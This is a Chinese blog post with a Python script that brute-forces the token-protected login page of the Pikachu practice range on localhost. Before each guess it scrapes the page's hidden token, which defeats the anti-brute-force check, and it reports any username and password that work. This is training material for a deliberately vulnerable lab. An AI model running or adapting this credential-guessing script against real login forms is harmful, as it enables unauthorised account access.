pk靶场token防爆破

已于 2023-03-14 08:44:23 修改
阅读量126 收藏
点赞数 1
分类专栏: python 文章标签: python
于 2023-03-14 08:40:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wtylcam/article/details/129516474
版权
提取token完成暴力破解pk靶场token防爆破页面
import requests
import re
import HackRequests

header={
    'Host': 'localhost',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://localhost',
    'Connection': 'close',
    'Referer': 'http://localhost/pk/vul/burteforce/bf_token.php',
    'Cookie': 'PHPSESSID=8b88vpd0fdkamclioioicgmf05',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1',
    'sec-ch-ua-platform': '"Windows"',
    'sec-ch-ua': '"Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"',
    'sec-ch-ua-mobile': '?0',
    }
def tokens():
    data=requests.post('http://localhost/pk/vul/burteforce/bf_token.php',headers=header)
    tokenz=re.compile('<input type="hidden" name="token" value="(.*?)" />',re.S)
    token=re.findall(tokenz,data.text)
    return token[0]
def pojie():
    uname=['admin','index','aaaa']
    pword=['123456','1515','465464']
    for i in uname:
        for a in pword:
            parm="username="+i+"&password="+a+"&token="+tokens()+'&submit=Login'
            print(parm)
            hack=HackRequests.hackRequests()
            data=hack.http('http://localhost/pk/vul/burteforce/bf_token.php',headers=header,post=parm,)
            dataz=re.compile('<p> login succ(e)ss</p>',re.S)
            stuta=re.findall(dataz,data.text())
            if stuta[0]=='e':
                print('用户名为{},密码为{}'.format(i,a))
pojie()
澳慢
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF漏洞token御介绍-01
09-15
CSRF漏洞token御介绍-01
pikachu靶场通关
热门推荐
无言道的博客
12-03 5万+
皮卡丘靶场详解,有什么问题可以在评论区留言。
pikachu 靶场搭建(完整版)
weixin_51446936的博客
06-10 4万+
一 环境准备 1 搭建环境 Windows10phpstudypikachu 2 下载链接 Pikachu靶机下载地址: https://github.com/zhuifengshaonianhanlu/pikachu phpstudy集成开发环境: https://www.xp.cn/ 二 安装教程 1 phpstudy 配置 下载完成后跟其它软件一样正常安装即可,如下 安装完成,双击启动如下 启动服务。启动服务过程中,如遇弹窗请求权限务必允许 浏览.
pikachu靶场打靶分析
weixin_57551677的博客
09-08 1334
pikachu靶场打靶训练分析
pikachu 靶场--token爆破
renyizou的博客
06-18 945
通过测试(抓包),发现token会变,所以不能用以前简单的爆破去跑字典了,会提示错误的token 所以需要在第n次爆破的时候,使用第n-1次返回包中携带的token,才能通过验证 (至于游客身份登录的token哪里来,其实在你第一次点开链接的时候,服务器给你的返回包里就已经有一个token了) 开始爆破 已知用户名是admin 先随便输一下抓个包 发到repeater,go一下,获得本次返回包中携带的token 再转发到inturder 标记下需要跑的参数,使用鱼叉模...
Pikachu-token爆破
m0_64005272的博客
12-27 1198
2. 使用Burp Suite抓包,可以看到请求头中有token参数,重放两次数据后会提示token有误,则说明每个数据包的token都会变化。选中token值,这个时候工具会自动编辑规则,复制token值备用,点击ok。查看源码我们就能发现,token的值输出在了前端源码上,容易被获取,因此也就失去了爆破的意义。②对认证错误的提交进行计数并给出限制,比如连续5次密码错误,锁定2小时。3.选择pitchfork进行爆破,添加账号、密码、token为变量。③必要的情况下,使用双因素认证。
Pikachu靶场:暴力破解之token爆破
witwitwiter的博客
04-05 2694
Pikachu靶场:暴力破解之token爆破? 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 1.将token以"type= 'hidden’”的形式输出在表单中; 2.在提交的认证的时候一起提交,并在后台对其进行校验; 但由于其token值输出在了前端源码中,容易被获取,因此也就失去了暴力破解的意义。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 输入正确用户名和密码弹出login succes
pikachu 返回值 token爆破-burpsuite
shinygod的博客
11-30 1193
知识点:利用 burpsuite 循环把前端的 token 值加到登录的 token 上。
暴力破解【验证码绕过、token爆破靶场实验
11-03 1755
本文主要介绍了以pikachu靶场为例,使用BurpSuite工具暴力破解【验证码绕过、token爆破】3种类型的实验。
PIKACHU 暴力破解之token爆破
weixin_43780092的博客
09-11 2947
​ 这题难点是token验证,没办法简单实现爆破,而因为token是明文,需要利用bupsuite来获取每次爆破更新的token值 在随意输入用户名和密码后,点击Forward在Intercept中可以发现token,多次尝试可以发现token值是每次都刷新的 送到intruder中来爆破,后清空所有选定变量,设置好password和token两个变量,同时方法选择pitchfork。 渗透测试之pikachu暴力破解(token爆破)_LKmnbZ's Blog-CSDN博客 ​ ...
pikachu靶场--暴力破解--验证码绕过以及token爆破知识点【1.2】~【1.4】
lmei1228的博客
05-31 618
如果我们想要爆破的话,在每次请求前要把上一次请求的响应包获取到,把其中的token值取出来,token采用递归payload,把上次请求的token值作为本次请求的token值,然后再进行发送,进入options选项,从响应中提取选项,fetch response,在响应包中选中token值,然后提交token,即可运行。暴力破解--验证码绕过 on client:正确的应该是,后端生成验证码,传到前端时是图片的形式,(而不是以字符串的形式)用户在前端输入验证码,与后端的验证码值做对比。
token刷新token刷新token刷新
04-09
token刷新token刷新token刷新
onenet MQTT Token计算工具
09-30
onenet MQTT Token计算工具
OneNET-token计算工具
09-22
OneNET-token计算工具 用于生成连接OneNET平台时的token值。便于大家下载使用
kindeditor图片上传携带token字段
11-27
kindeditor本地上传图片支持token字段,kindeditor本身图片上传并无token参数,本资源利用原生ajax改造上传代码。
【 书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建
最新发布
专注大数据与人工智能技术分享,欢迎私信加群互相学习!
05-03 1248
本篇笔记内容主要为 【书生·浦语大模型实战营】作业(六):Lagent & AgentLego 智能体应用搭建智能体的作业 ,主要对智能体应用理论部分及具体搭建流程详细介绍,并分别进行实战应用及可视化展示,欢迎大家交流学习!
链表刷题集
yajunjiao的专栏
04-30 957
本文主要列举了一些刷的题,不多,有那么几道,也建议各位去建立自己的刷题集。积少成多。
AttributeError: module ‘numpy‘ has no attribute ‘float‘.的解决方法
chen_znn的博客
04-30 598
本文记录了AttributeError: module 'numpy' has no attribute 'float'.的解决方法
ROS 2边学边练(41)-- 使用基于tf2_ros::MessageFilter带标记(位姿、时间...)的数据类型
DIANZI520SUA的专栏
04-30 1067
本篇主要介绍了tf2_ros::MessageFilter的一种应用案例,同时也涉及到了不同功能包之间通信的相关知识点。
pikachu靶场token爆破
10-17
具体来说,pikachu靶场token机制是这样的:每个用户登录后,系统会为其生成一个token,该token会在用户进行操作时被验证。如果用户在一定时间内没有进行任何操作,该token会失效。这样可以有效地止暴力破解攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值